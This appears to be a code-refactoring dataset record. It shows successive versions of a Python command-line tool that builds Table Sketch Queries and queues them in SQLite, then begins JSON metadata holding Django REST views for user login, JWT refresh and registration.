<|reserved_special_token_1|>
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<|reserved_special_token_0|>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
    """Prompt until a database name present in the `databases` table is given.

    Blank input falls back to 'concert_singer'.
    """
    while True:
        db_name = input('Database name (default: concert_singer) > ') or 'concert_singer'
        cur = conn.cursor()
        cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
        if cur.fetchone():
            return db_name
        print(f'<{db_name}> is not a valid database.')
def input_nlq():
    """Prompt for a natural-language query, defaulting to a sample question."""
    return input('NLQ (default: How many singers are there?)> ') or 'How many singers are there?'
def input_num_cols():
    """Prompt until the user enters an integer column count."""
    while True:
        raw = input('Number of columns > ')
        try:
            return int(raw)
        except Exception:
            print('Number of columns should be integer!')
def input_order():
    """Ask y/n whether results should be ordered; return True only for 'y'."""
    while True:
        answer = input('Should results be ordered? (y/n) > ')
        if answer == 'y':
            return True
        if answer == 'n':
            return False
        print('y/n only!')
def input_limit():
    """Prompt for an optional integer row limit; blank input means None."""
    while True:
        raw = input('Limit results to n tuples? (int or blank) > ')
        if not raw:
            return None
        try:
            return int(raw)
        except Exception:
            print('int or blank only!')
def input_tsq_types(num_cols):
    """Prompt for exactly `num_cols` comma-separated column types.

    Accepts only 'text' and 'number'; re-prompts on any invalid entry
    or a count mismatch.
    """
    while True:
        raw = input('Types (`text` or `number`, comma separated)> ')
        types = [part.strip() for part in raw.split(',')]
        if any(t not in ('text', 'number') for t in types):
            print('Types must be `text` or `number`')
        elif len(types) != num_cols:
            print('Number of types must match number of columns.')
        else:
            return types
def input_tsq_row_count():
    """Prompt until an integer TSQ row count is entered."""
    while True:
        raw = input('Number of TSQ rows (int) > ')
        try:
            return int(raw)
        except Exception:
            print('int only!')
def input_tsq_row(row_num, tsq_types):
    """Prompt for one TSQ row (semicolon-separated cells).

    Re-prompts until every cell whose declared type is 'number' parses
    as a float. Cell i is checked against tsq_types[i], so a row with
    more cells than declared types raises IndexError (as before).
    """
    while True:
        raw = input(f'Row {row_num} (semicolon-separated values) > ')
        cells = [part.strip() for part in raw.split(';')]
        ok = True
        for i, cell in enumerate(cells):
            if tsq_types[i] == 'number':
                try:
                    float(cell)
                except Exception:
                    print('At least one cell value is invalid.')
                    ok = False
                    break
        if ok:
            return cells
def main():
    """Interactively build a Table Sketch Query and enqueue it as a task.

    Reads the task-queue database path from ``config.ini``, prompts the
    user for the target database, NLQ and TSQ details, then inserts a
    'waiting' task row for a worker to pick up.
    """
    config = configparser.ConfigParser()
    config.read('config.ini')
    db_path = config['db']['path']

    conn = sqlite3.connect(db_path)

    db_name = input_db_name(conn)
    nlq = input_nlq()
    num_cols = input_num_cols()

    tsq = TableSketchQuery(num_cols)

    tsq.types = input_tsq_types(num_cols)

    tsq_row_count = input_tsq_row_count()
    for i in range(tsq_row_count):
        # Rows are 1-indexed in the prompt shown to the user.
        tsq.values.append(input_tsq_row(i+1, tsq.types))

    tsq.order = input_order()
    tsq.limit = input_limit()

    print(tsq.to_proto())

    cur = conn.cursor()
    # Serialize the TSQ protobuf and enqueue the task in 'waiting' state.
    cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
                   VALUES (?, ?, ?, ?, ?, ?)''',
                (str(uuid.uuid4()), db_name, nlq,
                 tsq.to_proto().SerializeToString(), 'waiting',
                 int(time.time())))
    conn.commit()
    conn.close()
# Script entry point.
if __name__ == '__main__':
    main()
|
flexible
|
{
"blob_id": "54ec1961f4835f575e7129bd0b2fcdeb97be2f03",
"index": 93,
"step-1": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<mask token>\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<mask token>\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n 
except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? 
(int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<mask token>\n",
"step-4": "import configparser\nimport sqlite3\nimport time\nimport uuid\nfrom duoquest.tsq import TableSketchQuery\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? 
(int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n 
SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import configparser\nimport sqlite3\nimport time\nimport uuid\n\nfrom duoquest.tsq import TableSketchQuery\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? 
(int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n\n return types\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n\n return tsq_row\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n\n conn = sqlite3.connect(db_path)\n\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n\n tsq = TableSketchQuery(num_cols)\n\n tsq.types = input_tsq_types(num_cols)\n\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i+1, tsq.types))\n\n tsq.order = input_order()\n tsq.limit = input_limit()\n\n print(tsq.to_proto())\n\n cur = conn.cursor()\n cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (str(uuid.uuid4()), db_name, nlq,\n 
tsq.to_proto().SerializeToString(), 'waiting',\n int(time.time())))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
6,
7,
8,
11,
12
]
}
|
[
6,
7,
8,
11,
12
] |
import os
from datetime import datetime, timedelta
from django.shortcuts import render
from django.utils.decorators import method_decorator
from rest_framework.viewsets import GenericViewSet, mixins
from common.jwt_util import generate_jwt
from .serializers import ApiUser, ApiUserSerializer, UserSerializer
from common.myresponse import StatusResponse
from rest_framework.generics import GenericAPIView
from .models import User
from common.utils.login_util import login_decorator
# Create your views here.
@method_decorator(login_decorator,name="list")
class UsersOptionsView(GenericViewSet, mixins.ListModelMixin):
"""
list:
返回用户列表
"""
serializer_class = ApiUserSerializer
queryset = User.objects.filter(is_superuser=0,is_active=1).all()
def list(self, request, *args, **kwargs):
return StatusResponse(data=super().list(request).data)
class UserLoginView(GenericAPIView):
def _generate_tokens(self, user_id, with_refresh_token=True):
"""
生成token 和refresh_token
:param user_id: 用户id
:return: token, refresh_token
"""
# 颁发JWT
now = datetime.utcnow()
expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))
token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)
refresh_token = None
if with_refresh_token:
refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))
refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)
return token, refresh_token
def post(self, request):
username = request.data.get("username")
password = request.data.get("password")
try:
user = User.objects.get(username=username)
except User.DoesNotExist as e:
return StatusResponse(http_code=400,data={"tip": "用户不存在"})
if user is not None and user.check_password(password):
token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)
data = {
"token": token,
"refresh_token": refresh_token,
"id": user.id,
"username": user.username
}
response = StatusResponse(data=data, http_code=201)
return response
return StatusResponse(http_code=400,data={"tip":"登录失败"})
def put(self,request):
if request.user_id and request.refresh:
token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)
data ={
"id":request.user_id,
"token":token
}
response = StatusResponse(data=data, http_code=201)
return response
else:
return StatusResponse(http_code=401, data={"tip": "token刷新失败"})
class UserRegistView(GenericAPIView):
serializer_class = UserSerializer
def post(self, request):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return StatusResponse(http_code=200,data=serializer.data)
|
normal
|
{
"blob_id": "0457ac2ecd0a951b0088c887539ab696797d68bc",
"index": 4557,
"step-1": "<mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-2": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n 
serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-3": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass 
UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
